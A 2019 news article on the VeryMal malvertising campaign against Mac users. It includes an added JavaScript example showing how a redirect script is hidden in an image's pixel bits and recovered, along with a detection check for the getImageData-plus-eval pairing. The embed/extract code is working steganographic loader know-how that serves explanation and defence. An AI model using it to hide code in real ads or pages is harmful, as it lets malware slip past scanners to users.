Posted on January 25, 2019 at 4:21 PM
Apple Products Targeted by Malware Hiding in Online Images
While online threats in general have been reported to be rising for several years, recent reports suggest that Apple users are now receiving a larger share of them. A report published by the ad-security firm Confiant makes the same point: its researchers documented a new malware-delivery method aimed squarely at Mac users.
According to the report, the campaign was run by a malvertising group Confiant tracks as VeryMal. The group targets Apple users specifically, which invited comparisons with ScamClub, another group reported in 2018.
VeryMal uses steganography to hide malicious code inside the images served in its online ads. Beyond both targeting Apple users, the two groups differ mostly in scale: ScamClub hijacked some 300 million web sessions of iOS users in the US, while VeryMal's tainted ads were served to roughly 5 million users. How many of those ended up with infected machines is not known.
The report also notes that this particular campaign ran for only two days, from January 11th to January 13th.
How does the attack work?
Confiant's report walks through the attack step by step. It begins when a Mac user loads a legitimate website that pulls in an ad slot. The creative in that slot contains an image file with code hidden in its pixel data, and the slot also loads a small JavaScript snippet. That script first checks whether the browser supports Apple's fonts, which VeryMal used as a test that the visitor really is on a Mac before going any further.
The script then reads the image's pixel values back and reassembles the hidden text from them, and passes the result to eval(). The recovered code is nothing more than a redirect that sends the browser to a new URL: a page showing a fake warning that the user's Adobe Flash Player is out of date and must be updated. A user who follows the prompt downloads the Shlayer trojan, a macOS dropper that installs itself and then fetches further malware.
What makes the method notable is its stealth. Ad-network scanners that inspect a creative's JavaScript see only a font check and some image handling; the redirect itself lives in pixel data, which is never examined as code. That indicates attackers' techniques are evolving to keep pace with Mac defences. The ad itself does no damage to the device beyond the redirect, so infection still depends on the user running the fake installer.
Researchers also note that VeryMal has tried similar attacks on Apple users before, with less sophisticated methods than this one.
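To make the mechanism concrete, here is an added example in JavaScript. It is not the page's, Confiant's or VeryMal's code: it models the loader stage by hiding a short script in the low bits of an RGBA pixel buffer shaped like the data a page gets back from canvas getImageData(), then recovering it. The bit-per-channel encoding, the 16-bit length prefix, the hidden redirect string, the example.invalid URL and the triage regexes are all assumptions made up for illustration; the real campaign's encoding is not described on this page, and the example returns the recovered text instead of executing it.

```javascript
// Added example for illustration only; not code from the page, Confiant or VeryMal.
// Models the loader stage: pixel data (shaped like ImageData.data from canvas
// getImageData()) carries executable text in the least-significant bits of the
// R, G and B channels. Encoding scheme, payload and URL are assumptions.

const CHANNELS_PER_PIXEL = 4; // RGBA, as canvas returns it
const LENGTH_BITS = 16;       // assumed payload-length prefix

// Constructed payload standing in for the hidden redirect. The URL is fictitious.
const SAMPLE_PAYLOAD = "window.location.replace('https://example.invalid/flash-update');";

// A flat white "image" buffer with alpha 255, the same layout canvas returns.
function makeBlankPixels(width, height) {
  return new Uint8ClampedArray(width * height * CHANNELS_PER_PIXEL).fill(255);
}

// Attacker side: write a 16-bit length, then the payload bytes, one bit per
// colour channel (alpha untouched). Each channel value changes by at most 1,
// which is invisible to the eye and to a scanner that only looks at the script.
function embedPayload(pixels, payloadBytes) {
  const capacityBits = (pixels.length / CHANNELS_PER_PIXEL) * 3;
  const neededBits = LENGTH_BITS + payloadBytes.length * 8;
  if (payloadBytes.length >= 1 << LENGTH_BITS || neededBits > capacityBits) {
    throw new Error("payload does not fit in the image");
  }
  const bits = [];
  for (let i = LENGTH_BITS - 1; i >= 0; i--) bits.push((payloadBytes.length >> i) & 1);
  for (const b of payloadBytes) for (let i = 7; i >= 0; i--) bits.push((b >> i) & 1);
  const out = new Uint8ClampedArray(pixels); // copy, leave the cover untouched
  let k = 0;
  for (let p = 0; p < out.length && k < bits.length; p += CHANNELS_PER_PIXEL) {
    for (let c = 0; c < 3 && k < bits.length; c++) {
      out[p + c] = (out[p + c] & 0xfe) | bits[k++];
    }
  }
  return out;
}

// Loader side: read the same bits back, honour the length prefix, and reject
// a buffer that does not actually carry a complete payload (e.g. a plain image).
function extractPayload(pixels) {
  const bits = [];
  for (let p = 0; p < pixels.length; p += CHANNELS_PER_PIXEL) {
    for (let c = 0; c < 3; c++) bits.push(pixels[p + c] & 1);
  }
  const readBits = (start, n) => {
    let v = 0;
    for (let i = 0; i < n; i++) v = (v << 1) | bits[start + i];
    return v;
  };
  const length = readBits(0, LENGTH_BITS);
  if (LENGTH_BITS + length * 8 > bits.length) {
    throw new Error("no complete payload in this image");
  }
  const out = new Uint8Array(length);
  for (let i = 0; i < length; i++) out[i] = readBits(LENGTH_BITS + i * 8, 8);
  return out;
}

// Full chain on a constructed 64x64 image. A real loader would hand the
// returned string to eval(); here it is only returned, never executed.
function recoverHiddenScript(width = 64, height = 64) {
  const cover = makeBlankPixels(width, height);
  const stego = embedPayload(cover, new TextEncoder().encode(SAMPLE_PAYLOAD));
  return new TextDecoder().decode(extractPayload(stego));
}

// Largest per-channel change the embedding introduced (0 or 1 by construction).
function maxChannelDelta(before, after) {
  let max = 0;
  for (let i = 0; i < before.length; i++) {
    max = Math.max(max, Math.abs(before[i] - after[i]));
  }
  return max;
}

// Defender side: crude triage for ad creatives. Reading pixels back out of a
// canvas and then evaluating a string in the same script is the combination
// this technique depends on; flag it for manual review. Regexes are assumptions.
const PIXEL_READ = /getImageData\s*\(/;
const DYNAMIC_EVAL = /\b(eval|Function)\s*\(/;
function looksLikeStegoLoader(scriptText) {
  return PIXEL_READ.test(scriptText) && DYNAMIC_EVAL.test(scriptText);
}
```

Running recoverHiddenScript() returns the redirect string unchanged, which is the whole point: an image that passes every visual and file-format check can still hand a script a line of code to execute. The triage check is deliberately blunt; legitimate creatives rarely need both getImageData() and eval(), so the pairing is a cheap signal for ad-quality pipelines even though it can be evaded by obfuscation.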
Online threats to Mac evolving
Malwarebytes also commented on the new method, confirming that the payload delivered to infected machines is Shlayer, which typically serves as a first-stage installer that opens the door to other malicious software.
So far, researchers believe that VeryMal, like ScamClub before it, aims most of its campaigns at users in the US. They also expect steganography to keep growing in popularity as a delivery technique, so Mac users need to stay alert when browsing. While the Mac has long been praised for stronger defences than other operating systems, attackers are clearly finding ways around them.
Because of this, users should never install software updates offered by a web page or any other third-party source, and should never approve an OS prompt for a password or permission without knowing why it appeared and what it will do. A site that insists Flash Player must be updated before it will show its content is the classic lure for exactly this kind of trojan.